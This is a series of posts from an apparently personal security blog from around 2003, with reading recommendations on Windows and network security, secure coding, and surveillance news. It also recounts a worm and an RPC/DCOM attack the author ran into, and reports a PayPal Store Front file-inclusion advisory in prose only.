Windows Services for Unix

Have you been on a Windows machine and wished you had your favorite Unix tools, and don't want to install cygwin?

Consider checking out Microsoft's Windows Services for Unix. I was suprised to find out that it won the Open Source Product Excellence Award for Best System Integration Software at the LinuxWorld Conference & Expo. Thats right, a penguin gave a bear an award.

Personally I really like cygwin, but I never knew this even existed. I will have to take a look and see how well integrated it is. Having clean NFS support to my Linux and BSD boxes could be very useful without the hacks I have had to do as of late. Then again Samba 3.0 works just great on the Windows side of things.

Anyways, if you are finding yourself more and more using Windows and need your Unix tools, here you go.

Standardizing Authentication Using the Security Assertion Markup Language (SAML)

Security Pipeline published an article on how to use Security Assertion Markup Language (SAML) to provide authentication. Its a pretty good read, even if you are not an XML/SAML demi-god.

I still think there needs to be vendor buy in for this. Standardizing a markup lanugage which is fragmented will not help the industry at all. Everyone has to get together and agree to this thing. Course, same could be said with the HTML standard *lol*

Carinvore DCSNet running over Sprints network

Well, according to an article at Government Computer News the FBI have signed onto Sprint Corp.’s Peerless IP fiber network, which operates independently of the public Internet.

Why? So they can provide secure VPN to over 59 undisclosed locations which are running DCSNet (formally called Carinvore until it was beaten to death in the media) DCSNet’s purpose is surveillance of phone call detail and content traced by law enforcement. It also extends surveillance to e-mail communications.

Big brother is watching. Let the conspiracy theories commence!

NSA Cisco Router Security Guidelines

If you liked the NSA Security Guidelines I recommended for Windows way back in May and wished they had similar documents for your network hardware, fear not! Today the NSA released National Security Agency Security Recommendation Guides for Cisco Router Guides.

If you got Cisco gear, you may want to read up on this.

Next-Generation Secure Computing Base (NGSCB)

Just finished reading an interesting article by Microsoft entitled Next-Generation Secure Computing Base: Development Considerations for Nexus Computing Agents.

In it Microsoft talks about a new system of seperating code into trusted and normal modes, which they refer to as Nexus Mode and Standard Mode. In standard mode, nothing really changes... the Windows kernel uses its existing system to maintain operations. However when in Nexus Mode, there is a better level of assurance when it comes to secure input/output, protected memory, sealed storage (great for storing keys) and attestation.

By writing Nexus Computing Agents (NCA), a developer could provide a more trusted environment through the Nexus Security Kernel than that of the standard Windows kernel, which has become very brittle over time. The result is an innovative platform that provides a more secure and trustworthy computing environment to Microsoft Windows users.

Not sure what to make of it. I hope that they will be giving me access to this at the DevCon at the Microsoft campus next month, so I can understand it better myself.

Any way you look at it, its something interesting to read. Happy reading.

The Anatomy of a Bug

I just finished reading a blog entry by a Microsoft tester on the anatomy of a bug. Its really interesting to hear how a really small and silly bug can balloon into a testing nightmare.

As I was reading it I was saying to myself: "Developer did a naughty think and trusted a foreign key location that he doesn't control. Easy fix, recreate the key each time the key could be used, and fail cleanly if perms do not permit that."

Well, that ended up being the fix, but I never fathemed the amount of testing around the fix that would be needed. Especially when it has to be translated into 20 languages. Man i8n is a pain.

Well worth the read, even only to glimpse at the testing required to fix a bug at Microsoft.

Threat Modeling for Drivers

I found a good paper on threat modeling device drivers for Windows. If like me you spend a lot of time writing kernel-mode code for Windows, it is important that you read this paper.

It covers STRIDE modeling right up to DREAD analysis. I really appreciate publications like this coming out of Microsoft. Thanks.

Happy reading.

Secure Coding Technigues - Validating User Input

David Wheeler (from Unix Secure programming HOWTO fame) published a secure programming article this week on validating input.

My presentation I give to the local universities on secure coding techniques is pretty much what David is talking about here. You can not trust data moving between untrusted boundaries such as the user input and trusted boundaries in your code. You must validate all user input.

More to the point, you should consider all input suspicious until proven otherwise. This means you don't validate and check for WRONG data, you only accept data that is formatted correctly. Everything else is denied!

Anyway you look at it, it is always good to remember this technique. David does that well in this article.

Happy reading.

Obfuscating C# to Thwart Reverse Engineering

Microsoft released another good article (thats three in one day!) on obfuscating your code to prevent reverse engineering. This has been a problem that has plagued me in Java for years (although the obfuscators were getting better ).

If you don't know, obfuscation is a technique that provides for seamless renaming of symbols in assemblies as well as other tricks to foil decompilers. When it is properly applied, obfuscation can increase the protection against decompilation by many orders of magnitude, while leaving the application intact. Obfuscation is commonly used in Java environments and for years has been helping companies protect the intellectual property in their Java-based products.

Read this article to learn how it can be done for your C# apps.

Keeping Your Data Secure with AES

Microsoft released an interesting article on using the new AES standard within C# under .NET.

This article even includes some significant information on the algorithm itself, and how its implemented within the .NET architecture. It also includes a full example on encrypting and decrypting .NET data!

Nice little article to add to your arsenal if you are working on .NET.

Expert Tips for Finding Security Defects in Your Code

Michael Howard released a new article for Microsoft on how to review and audit your code to find security defects.

If you read some of his previous writings (like one of my favorite books, "Writing Secure Code") you won't find anything new here. But for a lot of you, this is a great topic to continue to read up on. Never hurts to be re-enforced with the same useful information.

Happy reading.

Flea: New EMail Virus tried to attack me

Well, apparently there is a new worm out there called Flea. This little sucker can execute automatically when users open HTML formatted emails in Microsoft Outlook or Outlook Express. Unlike most Windows nasties, the bug does not depend on a user opening an infectious file to do its mischief, and guess what... I almost infected myself.

I say almost, because a funny thing happened. My latest work with my Intrusion Prevention System (IPS) that provides mandatory access control included a new feature this week. I added the ability to shield the 'Windows base install directory' from untrusted access. This was acomplished by setting a security policy which allows read and execute access to the systemroot directory (normal c:\windows in XP) and all its subdirs, but prompts the administrator with a default DENY if anyone attempts to write or delete anything in the Windows directory, unless its Windows Update.

Well guess what? This morning in my inbox seemed to be a harmless message that passed my Spamassassin server filter and my host-based anti-virus scanner. When I clicked on it I was prompted from my IPS code that there was an attempt to write to the Windows directory, something I know I didn't ask for. I clicked the "Deny Access" button and the attack ended. It hence stopped the propogation dead in its tracks, and the 'Flea" was dead.

I am kinda happy I added that feature this week. It has already paid for itself by protecting me. The anti-virus product I use from NAI didn't have a signature for this beast. And there lies the problem with all such products, not just NAI. Signature based policy enforcement alone is not enough. Strong security policies which use anomoly detection with least privilege go a lot further.

In my case, I was protected from this unknown threat because I already determined that there is no reason for anyone or anything to write to the Windows base system unless it is Windows Update itself. (Well to be honest there are some other policies as well to allow logging etc, but that is out of scope of what we are talking about) In applying this policy, it doesn't matter if a new strain of this attack occurs. Its propagation is revoked because it goes against the nature of the policy defined.

Man what a neat way to see my code work in action when I wasn't expecting it! Good way to end a great coding week!

Troubleshooting Internet Connection Firewall on Windows® XP

Today Microsoft released a nice Troubleshooting Internet Connection Firewall on Microsoft® Windows® XP document that steps you through the proper configuration of the ICF.

If you are running or administering Windows XP or higher, you should probably download this document and ensure that you have configured your firewall correctly. (Assuming of course that you are using ICF and not some other personal firewall)

Happy reading.

Microsoft talks about Internet security

There was an interesting article I read this morning in which Bob Muglia (Senior VP at Microsoft) is interviewed by C|NET News on Internet Security.

It is always interesting to listen to various people at Microsoft speak about security. They all have the same message, but with different undertones. Nothing really new in the interview, but it was interesting how Bob explained the "shield" Ballmer talked about last week.

Enjoy.

User Interaction Design for Secure Systems

Following up on my previous post about Secure Interaction Design, I found Ka-Ping Yee's paper on User Interaction Design for Secure Systems worth the read.

The security of any computer system that is confgured or operated by human beings critically depends on the information conveyed by the user interface, the decisions of the users, and the interpretation of their actions. This paper establishes some starting points for reasoning about security from a user-centred point of view: it proposes to model systems in terms of actors and actions, and introduces the concept of the subjective actor-ability state.

If you are interested in understanding this model of thinking as it relates to the user experience in secure systems, it is well worth your time to check this out.

Happy reading.

Secure Interaction Design

Recently Brian was commenting on User Interface Guidelines and provided some useful links to the guidelines for different platforms. With the recent iTunes now available in Windows, it was funny to see Apple guidelines applied to a Windows platform.

What interested me was not in the guidelines themselves, but how void they were in discussing security aspects with respect to the UI. Now before you jump down my throat and quote Microsoft's own Steve Lipner and say "Usability, flexibility, security are a set of trade-offs", I would like to alter your thinking and dispute that by saying that "usability and security aren't contrary goals; we shouldn't assume that we must sacrifice one for the sake of the other".

In fact, a system that's hard to understand and use will almost certainly have security problems in practice. And a more secure system is a more reliable, more effective system: hence, a more usable system. Here's a definition from Garfinkel and Spafford's book, Practical UNIX and Internet Security:

"A computer is secure if you can depend on it and its software to behave as you expect."

Doesn't that look like it would be good for usability, too?

Now, I wish I could take credit for this thinking. But I cannot. The last paragraph is actually a quote from Ka-Ping Yee, who has devoted time to develop a site in relation to Secure Interaction Design. In it, he points to various papers that support his argument, and comes to suggest a list of ten principles for secure interaction design:

1. Path of Least Resistance. The most natural way to do any task should also be the most secure way.
   
2. Appropriate Boundaries. The interface should expose, and the system should enforce, distinctions between objects and between actions along boundaries that matter to the user.
   
3. Explicit Authorization. A user's authorities must only be provided to other actors as a result of an explicit user action that is understood to imply granting.
   
4. Visibility. The interface should allow the user to easily review any active actors and authority relationships that would affect security-relevant decisions.
   
5. Revocability. The interface should allow the user to easily revoke authorities that the user has granted, wherever revocation is possible.
   
6. Expected Ability. The interface must not give the user the impression that it is possible to do something that cannot actually be done.
   
7. Trusted Path. The interface must provide an unspoofable and faithful communication channel between the user and any entity trusted to manipulate authorities on the user's behalf.
   
8. Identifiability. The interface should enforce that distinct objects and distinct actions have unspoofably identifiable and distinguishable representations.
   
9. Expressiveness. The interface should provide enough expressive power (a) to describe a safe security policy without undue difficulty; and (b) to allow users to express security policies in terms that fit their goals.
   
10. Clarity. The effect of any security-relevant action must be clearly apparent to the user before the action is taken.
    

Further to this, he has created an excellent poster that now hangs on my wall which reflects these principles. It looks something like this:

If you are interested in usability in software, while at the same time achieving your security goals, consider browsing this site on Secure Interaction Design. Its well worth the effort.

Ballmer says Linux not accountable for security

According to Steve Ballmer, the rivalry between Microsoft Windows and Linux comes down to the basic question of whom customers should trust.

There is an article in which Mr. Ballmer says that "There's no roadmap for Linux. Nobody is held accountable for security problems with Linux."

I do not see how the open development process of Linux equates to the fact we should blindly trust Microsoft. There is a definitive path for kernel development, just as there is for Windows. And, does this mean we can now hold Microsoft accountable because Steve says we can? If so, I would like to know who to send the bill to for all the overtime InfoSec people are putting in cleaning up the mess of the recent months.

Anyways, I don't have enough time in the day to criticize such erroneous thinking. I think Mr. Ballmer needs a tutorial on Crystal Box security vs. Black Box security thinking, and then equate the word "TRUST" accordingly.

You should read the article yourself. Ballmar makes the Microsoft position that they should be trusted because they have the infrastructure to properly address security patches. This is the SAME infrastructure that released the ORIGINAL code that had security issues, and the SAME infrastructure that did the "amazing code audit" as part of their Trustworthy Computing Initative.

Should we trust this SAME infrastructure? No, I think not. Want to earn my trust Microsoft? How about taking these actions:

1. Perform a 3rd Party Code Audit from an UNBIASED source. Do not pick vendors who are loyal to you and would rather FIRE an honest report rather than accept it.
   
2. Stop all new development and refactor the brittleness in your existing systems. We have to wait till 2006-2007 for Longhorn server. Why not invest 6 months bringing the NT core up to date which your own teams at Microsoft admit were not designed with Secure Coding Principles in mind? You would strengthen your system exponentialy and can carry on for use in LongHorn.
   
3. Provide an integrated patch management system that works with not only your OS, but the applications on the same platform
   
4. Release a public API for this patch management system so other vendors can use the same infrastructure. Consider looking at how well Debian's apt-get works. A customer could simply add another vendors "server" to the list of server sources and can get updated with dependancies on the fly
   

Take these steps and I will begin to consider trusting you more openly.

P.S. In all fairness, Microsoft IS getting better. But this is the type of thing where "Trust, but Verify" is in order. Blind trust is NOT an option yet.

Security Considerations in SDLC

Today I stumbled upon an interesting gem published by NIST this month as Publication 800-64. This paper is entitled Security Considerations in the Information System Development Life Cycle, and is work in which the National Institute of Standard and Technology make recommendations on a framework that incorporates security in all phases of the system development life cycle (SDLC).

I haven't had a chance to completely read through it in depth, but from my first reading it seems well thought out and provides good guidelines for any project that should include security during the early stages of design, rather than later on in the implementation/operational stages of deployment. (Well to be honest, this should ALWAYS be the case anyways, since its much more expensive to bolt on a hacked security solution after the fact)

Happy reading!

War Nibbling: Bluetooth Insecurity

Today I had a chance to read an interesting paper on the insecurities of bluetooth. @stake published a paper called War Nibbling: Bluetooth Insecurity which goes into detail discussing the protocol's design and implementation flaws. Well worth the read in itself.

On top of that, today they released Redfang - The Bluetooth Hunter, a information gathering tool which exploits the weaknesses found in their paper.

Interesting stuff. Happy reading!

Yet another Linux distro for InfoSec Pros

In my opinion, one of Linux's most powerful attributes is one of its worst failures. Everyone shouts out that "choices" are good. And to a point, I agree with that. But today I learned on freshmeat that there is yet ANOTHER Linux Bootable CD distro focused on Information Security Professionals called L.A.S..

I do not mean to criticize L.A.S. as I haven't tried it, but I don't need to. From their own admissions, its based on Knoppix. *sigh* So why not help out the Knoppix-STD project thats been around for a while! This is one of the falling graces of Linux. Everyone wants to build their own tools instead of getting together, consolidate talent and make kick ass product. The Knoppix "Security Tools Distribution" is something I have talked about before, and is something I enjoy using. More to the point, it is exactly what InfoSec personnel need in their toolkits. The effort that could go into making it better (like better audit reporting facilities for forensic purposes etc) would be way more productive than patching together yet another distro.

But I digress. If you want to try 'yet another distro' for InfoSec purposes, consider seeing if L.A.S. is to your liking.

Characterizing the Performance of NIDS

I just finished reading an interesting paper in which the authors measure and compare two major components of the Network Intrusion Detection System (NIDS) processing cost on a number of diverse systems to pinpoint performance bottlenecks and to determine the impact of operating system and architecture differences.

Suprisingly the results show that even on moderate-speed networks, many systems are inadequate as NIDS platforms. You should read it for yourself to make your own interpretation.

Happy reading.

A+ on Microsoft's Report Card

Recently Scoble was giving Microsoft a report card on how they were doing. It is easy to criticize Microsoft due to its very size, and the fact we have had to put up with a lot of crap over the past few years as they dominated our lives.

What was more funny was the last time I saw Scoble, I discussed how I didn't feel Microsoft was small ISV friendly, as I couldn't afford to buy all the software to run a Microsoft shop. Which was and is why I run Linux on all our servers.

But today I want to give Microsoft some praise. More to the point, I would like to give Microsoft an A+ on working with small ISV like me. And I don't say that lightly. I mean it. Today I am impressed with something I heard about Microsoft's outreach to small ISVs like me.

You see I complained a while ago about how expensive it was to tool up to do Windows kernel mode development. I was spoiled on all the free tools I have used on Linux and Unix enviornments for the past 7 years and forgot how much tools on Microsoft platforms cost. I spent thousands of dollars on new development tools (DDK, IFS Kit, Visual Studio etc etc) and easily spent enough money that I could have bought a good used car so I could deliver Pizza or something.

Well today Joel on Software posted something that made my head spin around. After calling my Microsoft rep to check in about this I now retract my comments and would like to apologize to Microsoft.. atleast to a limiting degree. I think they were wrong in selling me stuff when they knew this program existed. Or atleast this information should be more readily available so more people might transition back from a Unix world to the Windows world for development.

What am I talking about? I am talking about the Empower Program for ISV that Joel talked about today. For $795 US I am going to be getting:

• 5 copies of MSDN Universal (which includes basically everything a dev needs)
  
• 5 copies of Windows XP Pro
  
• 5 copies of Office XP
  

I am also getting a software license with 5 Client Access Licenses (CALS) for:

• Microsoft Windows Server 2003
  
• Microsoft Exchange 2000 Server
  
• Microsoft SQL Server™ 2000
  
• Microsoft SharePoint™ Portal Server
  

Kudos to Microsoft on such a program. And thanks to Joel for pointing it out to me. Only wish Scoble would have known this so he could have told me before I sunk cash into everything else.

NIST releases Guidelines on Network Security Testing

Today NIST released Special Publication 800-42, Guidelines on Network Security Testing.

It's a thorough document to say the least. Well written though, as should be expected of NIST. The guide stresses the need for an effective security testing program within federal agencies, and goes in detail on how to do so.

I like reading resources like this. I hope you like it. Happy reading.

Microsoft's IT Pro Security Zone

By way of Scoble I found out that Microsoft has launched the IT Pro Security Zone. Its a site to get answers to your security questions and connect with your community. You can find dynamically generated links to the most active security newsgroups, discussion topics, and KB articles. You can also find the latest security updates, downloads, FAQs, and articles from MVPs just waiting to help.

I think this is a pretty good resource to have on hand if you are administering a Windows environment.

Enjoy.

PDC Security Symposium

Ok now I am vexed. I decided not to go to the PDC because I wasn't all to interested in learning about Longhorn, especially since its atleast 3 years away. The information on the tracks had very little to do with security, and I thought nothing of it.

Today I get an update from MSDN telling me there is now a Security Symposium which would have been right up my alley. And guess what... the PDC is sold out. :(

Grrrrrrrrr. Well thats ok. I am more looking forward to the DevCon Microsoft is hosting on Campus in November. That should be a pretty good conference with lots of good security tracks. I am hoping to make that one. So, if you are in the Seattle area I will probably be found in Building 33 during the conference, and in the evenings free to partake in Seattle's goodness. I know I am going out with Scoble a bit, and hope to catch a beer with Michael Howard, but short of that.. pretty available in the evenings. Drop me a line if yer interested.

10 steps to a successful security policy

ComputerWorld has an article which discusses 10 steps to a successful security policy.

Nothing really new here, but a good primer for those who don't know how to do it. And you really should be doing this.

Happy reading.

Remote Debugging over DCOM

Well, I have been hung up for over a week with a weird bug in one of my C# apps. What made it even more difficult to track down was that I had to run it in a VMWare session because it is unstable and does nasty things to the system due to its interaction with my kernel-mode driver. (Can you say corrupt the system when you hit a single button... a scriptkiddie paradise.... weeeeeeeeeeee)

Well the solution was to use remote debugging. Sounds easy enough. Ya right.

The idea of remote debugging is sound. I use remote debugging over serial... well a named pipe actually pretending to be a com port with VMWare. You can see my HOWTO on that over here. This works great and I have been doing this sort of debugging for over six months now.

So what harm could there be of also remote debugging my application?

Well now that was a pickle. I read every document on MSDN, in the Help docs and through newsgroups. All I had to do was install Remote Debugging Components within the VMWare session and it should work fine. NOT.

Tried asking around on IRC and Usenet. I am told to use TCP/IP debugging. After spending a few hours looking on how to do this and trying to set it up I find out it only works for native C/C++ code, and will not work with stand alone C# apps. Grrrrrrrr. Waste more time putting everything back the way it was.

Finally I figure I am going to bite the bullet and just install Visual Studio in VMWare and debug it locally. Of course that fails twice (stupid autorun on my host machine STILL runs after I set AutoRun to 0 in the registry). In desperation I step back and decide to rethink my strategy. I have wasted a week trying to get this working, and nothing is helping.

After spending most of last night googling every combination I could think of for "remote debugging C# application" I found the jewel that saved my life. I found a document over at gotdotnet.com that was written by Min Kwan Park, a guy within the Microsoft CSharp Debugger QA team. The topic of the document? "The VS7 Debugger doesn’t work. What can I do?". No way. This can't be. Sure enough the answer sits in the last few paragraphs of the document.

On XP Pro, because of the default security setting for "sharing and security model for local accounts", this remote debugging is not allowed by default.

GRRRRRRRRRRRRRRRRRRRRRRRR. Its an undocumented setting that has to be changed for remote debugging to work! Well, to be fair I guess it was documented in this jewel, but it wasn't found during the last week of searching on MSDN, the VS help docs or even the newsgroups.

So now everything is working great. With my multiple monitors I have one hosting my remote debug session of my kernel driver with WinDgb and the other hosting my remote debug session of my C# app in the Visual Studio .NET debugger. 2 minutes later I found my bug. (And god what a dumb bug it was).

*sigh*

Celldar - The next radar?

BusinessWeek reports of a new technology that uses upiquitous cell-phone signals to create cost effective radar through cell towers!

This is a really kewl approach to the radar issue. Because its a passive system (there is no transmitter only a receiver) you could not actually pin point the location of the celldar station, rendering it invisible to you.. but allows it to see everything.

It sounds exciting. You can use all the cell towers around the country to map out movement of virtually anything, or anyone. (Uh oh.. the privacy people are gonna go nuts). An interesting tangent from this is that Lockheed-Martin is building a system using FM radio and TV signals to do the same thing. With these signals being much stronger, they can actually passive-radar as far as 135 miles away. They call the technology Silent Sentry, and I can see why. And the kicker, instead of spending $20-$30 Million on a radar system, these things can be made for lik $20,000. HUGE savings that can be passed on to the right people. Imagine every airport now having radar! (Most don't you know)

This has to make you think though. If you can triangulate a cell signal from 3 towers, and then lock onto the user holding the phone, you could "mark" him and then use the software in celldar to track him. Go ahead Osama, make that next phone call!

Fiction becoming reality? We will have to see.

My Latest installation eXPerience

Today was the day of the turkey. Thanksgiving feast for us all. Or so I thought.

While visiting family for the holiday I helped my mother-in-law get her computer fixed up. She has an old HP Pavillion 6640C with 64M megs of ram, and wanted to get her computer to go faster. She bought some goodies (256 megs of ram and a new OS) and had them waiting for me when I arrived for Thanksgiving dinner.

No worries I thought to myself. This should be a piece of cake (or pumpkin pie as it were)

6 hours later, I finally finished up the hell that was to be known as this year's Thanksgiving feast.

Oh, this wasn't like any installation I had before. I was expecting this install to be easy. I even brought a CD with XPSP1 on it knowing I would need to do some patching. But I never realized how much patching I had to do.

It all started with the switch from Windows98 to XP Pro. It seems HP will not support such an upgrade, because it was never tested in their lab. They would prefer that you buy a new machine. Umm... no. Not gonna happen. They use their computer to surf the net and do the occassional email, which they even use on a browser via hotmail.

My first install of XP failed. Bios incompatibilities. No ACPI support. Ok, that sucks. Need to find a new bios. None exist. Google. Lots of complaints, but no solution to an updated bios. HP won't release an updated bios. Ok fine. Figure out how to get around ACPI. Ahh Microsoft has an undocumented secret key to do just that. Hit F7 as soon as the Windows Setup starts, and it toggles ACPI support. Guess I hit it one to many times as I toggled it off and back on. Install failed. Realize that I must of hit F7 twice, and reinstall again. Ahhh.. worked this time.

Now, this 6640C is pretty slow compared to what I normally use. The install took over an hour. Half way through an error occurs and COM+ can not be registered. Damn. Dinner time.

[Rush through my dinner in no time fast, not getting a chance to really ENJOY the festivities]

Ok back. Install still hooped. Reboot. XP recovers nicely and continues on, only backtracking part of the install. Install completes and I am thinking the rough stuff is over. Dumb assumption on my part.

So after reboot I set up the accounts, and throw in my XPSP1 cd I burned. I thought I was being smart because I thought ahead to download the huge (120+ Meg) service pack and wasn't looking forward to downloading something like that with a modem. I start the upgrade, minding my own business and reading more of the book I took along (Beyond Fear from Bruce Schneier. My second reading of it. Good book)

At about 90% complete something weird happens. A dialog pops up and says some RPC services are corrupt and are shutting down. A few more errors occur and I realize that I just got nailed with a RPC/DCOM attack. How the hell? Oh crap, there is a DSL modem on the floor. Parents upgraded to broadband and I forgot about that. The damn XP default network set up configured itself and Telus had this completely unprotected and exposed XP box for the glorious scriptkiddies to nail. And they did. Oh yaah... now I gotta friggin patch an exploited box.

Well, luck be a lady.. the service pack was installing and had an exclusive handle to some of the files.. the exploit didn't actually attach itself to much. And with nothing configured or installed yet... the malicious code had nothing left to propagate with. Oh thank heavens, I was not wanting to reinstall XP again.

So after I reboot (no choice, basic winservices died when the penetration happened and COM services were toasted) I unplug the DSL modem and let the service pack install. While its installing I clean up the residue from the attack, set up the XP firewall and prepare to plug this thing back into the Net. (At this point its a 'thing' now... it lost the honor of being a computer as I now regret agreeing to fix it during a fantastic thanksgiving feast)

So I go to do a Windows update. 27 critical security patches that are over 38 megs. Well, atleast there is broadband now, so that shouldn't take long. *sigh*

The download did indeed come down lightening fast. But then the patching started. This is where life became fun. It took over 3 hours for the 27 patches to get applied. I could do nothing... it just went on its way with the harddrive writing like mad and the CPU crying for some free cycles. Just when I thought it was freezing up, another HD write would occur and I realized this little machine was doing its best to keep up.

Finally contented with a 3 hour 'windows update' (and the luxury of looking through my wife's family photo albumns for the 3 hours) I finally was prompted for a reboot.

The restart was agonizing. It chugged and churned and I was sure the think was hooped. 5 minutes later, somehow, somewhere the gods looked down and said '"that's enought pain for Dana, he can have more torture tommorow when he needs to fix DCOM remote debugging issues on his own box". It came up. And it was good. It was FASTER than Win98. It was prettier. And it was now 11:30. Time to go home, and eat leftovers from the feast.

Moral of the story? I dunno, pick from the many veins this can be read from this eXPerience. I look at this as a positive experience though. I again am taught about the fallicies of human beings and the false sense of security I thought I had during the install. (Thanks script kiddie) I am so used to flawless XP installs on my machines in a 'clean room' that is properly firewalled and segmented off so I can go to town upgrading quickly. I also got another side benefit. I am trying to lose weight anyways, so I didn't have time to gorge on all the yummy food! Of course, just thinking about it has me hungry so I think I will go make myself a small plate and head to bed.

Hey, I hope your thanksgiving was better than mine. If you haven't had thanksgiving, remember not to get roped into fixing the inlaws computer during the upcoming dinner!

It's Official: No Longhorn Until 2006

Microsoft Watch reports that at Microsoft's worldwide partner conference this week, Microsoft finally admitted that Longhorn won't see the light of day until 2006.

What saddens me is that means that the Longhorn SERVER won't be out until sometime in 2007. Wow that seems like a far ways off to wait for the next server platform release which will include all the new security tidbits that Longhorn project is keeping under lock and key.

Also makes you wonder how good the PDC will be. If they are waiting 3 more years before Longhorn's release, shouldn't they have waited a year or so before announcing things, since 3 years is a PRETTY LONG TIME in Internet time?

T-Mobile to use PEAP for Secure 802.11 Auth

The Seattle Times report s that T-Mobile is going to roll out 802.1x authentication using secure EAP (actually they will use Protected EAP, better known as PEAP).

Early in the new year users of Windows XP will be able to get a patch from Microsoft which will include 'Wireless Provision Services' that will be able to have their own separately encrypted local channel. This is exciting as it means that customers with the right software and without VPN access suddenly have a very high degree of local link security and integrity.

I like the idea of Hotspots. And I like how T-Mobile is approaching it. I wish them great success!

Floating data storage

There has been a long thread on Bugtraq about a paper released called Juggling with packets: floating data storage. In the paper, the authors explores the possibilities of using certain properties of the Internet or any other large network to create a reliable, volatile distributed data storage of a large capacity.

The idea is that as opposed to traditional methods of parasitic data storage (P2P abuse, open FTP servers, binary Usenet postings), the use of float data storage 'on the wire' may or may not leave a trail of data. In other words, you could throw your warez in a network stream and never fear getting caught. Turn the power off and it goes away.

This of course isn't completely true. You can easily record anything that touches the wire, but the theory is quite interesting. Instead of fretting about disk scrubbing data of your harddrive you can simply NOT store it. Not sure if I would appreciate a few gigs of data floating on my network, but hey, it's not my idea.

Would be interesting to see where this might lead. There has been various views on this on the Bugtraq list if you are interested.

Site face lift

I decided to do a face lift on the blog, I hope you like it. Its now done (well, as much as I wanna do tonight anyways).

There is some pretty ugly CSS hacks in there which probably fail every friggin validator out there. But it renders in IE, Mozilla, FireBird and Opera. I would expect most others are fine.

Shouldn't matter though, since you SHOULD be reading my blog via RSS in your aggregator! :)

I have added some references to some of my favorite books on my bookself, as well as some of my favorite papers. These are of course subjective, and chosen at a whim. Some are old and outdated, but are references I seem to always remember in the back of my head.

Hope you like the new site.

Blog changes in Progress

I am going to be overhauling my blog tonight, so bare with me if you encounter layout issues, and other such problems.

I will post when it is complete.

Thanks for your patience.

Terrorism Information Awareness Program Shut Down

Inside DARPA Admiral John Poindexter ran the Information Awareness Office and was building a vast computerized terrorism surveillance system. This system included some pretty kewl survillance software, and was starting to be known as the watch dog of the Americian people, scanning personal records and building profiles of suspected terrorist-like activities.

Well, Wired reports that the project has been cancelled. Some software will be picked up by other government agencies (ie: read National Foreign Intelligence Program from using processing, analysis and collaboration tools for counterterrorism foreign-intelligence purposes.)

Now Americians can feel free to buy the Anarchists Handbook online or check our Nuclear Fusion For Dummies without being targetted in Darpa. You'll just be flagged in the FBI database. Oh wait, you weren't supposed to know that.

Nice Tablet PC

I think I found the machine I might start drooling over. Scoble points out that Acer is coming out with the Travelmate C300 which is a supped up Pentium M 1.5 Ghz with 512 Megs of ram, a 14.1 inch display, a 40 gig harddrive and all the trimmings.

My laptop is much to slow to do development with Developer Studio, and I am going to need to upgrade soon. Although my desktop machine works great (and I don't know if I can live without my dual monitor set up) I spend a lot of time away from it in places where I could be productive if I had one of these things.

It has up to a 5 hour battery life which isn't to shabby and even has a built in bay for a CDRW/DVD combo. My only complaints are that it doesn't have bluetooth and the thing weights in at 6.2 pounds. My laptop right now is only 2 pounds, and I don't think I would want anything much heavier. (Ya I have been spoiled)

Chances are I will end up buying a lighter one that is used on Ebay or something. As much as this thing looks neat, I am not sure if I wanna pour $2,299 US for something that is 6.5 pounds. I'm told NEC has some of the lightest Tablets. I will have to check that out one of these days.

Microsoft Security Patch Management

Everyone likes to knock MS for security patches. Solas had a good rant on it today. I think we need to remember that there are improved ways to deal with security in Windows environments, its just that not many people know about them.

Microsoft released a data sheet today about their Systems Management Server 2003 product and how it deals with Security Patch Management. You can improve your security posture of your Windows environment through increased vulnerability awareness and reliable targeted delivery of updates. (Their words, not mine)

If you want to try to understand what SMS is about, you might wanna read this. You might find it useful when exploring what tools to use to manage security for your Windows platforms.

Canadian government invests in rural connectivity

Here is why I love being a Canadian. The Government of Canada announced a strategic initiative through which they plan to extend broadband Internet connectivity to the nation's most remote communities via satellite.

We are one of the best wired nations because we would rather build infrastructure and build the foundation of knowledge for our children so we can grow as a better nation, rather than spend billions of dollars meddling in other countries affairs. I am impressed on how the government intends to utilize this new connectivity. As an example, in rural communities where it might take days to get health care due to distance, doctors/nurses can perform some consultations with videoconferencing equipment quickly. In some cases, the doctors could even be in Toronto, Vancouver or even over seas. Thats just kewl!

I am proud to be Canadian, as I always am. But things like this make be glow inside. What a great country to live in.

Microsoft details new 'Secure The Perimeter' Initiative

CRN has an article in which Bob Muglia (senior VP at Microsoft) discusses Microsoft's next-generation security initiative.

Basically he is saying what I have been preaching for years. Defense in depth with least privilege policies while at the same time seperating roles and responsibilities. Top that off with secure defaults (why the heck hasn't the builtin firewall been on by default since it shipped?)

Time will tell if Microsoft will get this right. I hope so. I know they are trying, and if this article is any indication they are on the right track.

I love how the article ends up. Both Muglia and Microsoft CEO Steve Ballmer admit [security is] a bigger worry than Linux.

PayPal Store Front Vulnerability

Securiteam reports that a vulnerability in the product allows remote attackers to include arbitrary PHP files (that are then executed) that can be stored either locally on the server, or remotely.

In other words, your cart is in doodoo if an attacker decides they wish to include an external file and execute arbitrary commands with the privileges of the web server. (Typically www-data or nobody)

Credits to Astharot over at Zone-h for the original security advisory.

So, if you are using the PayPal store front for you eBusiness... you might wanna look into this.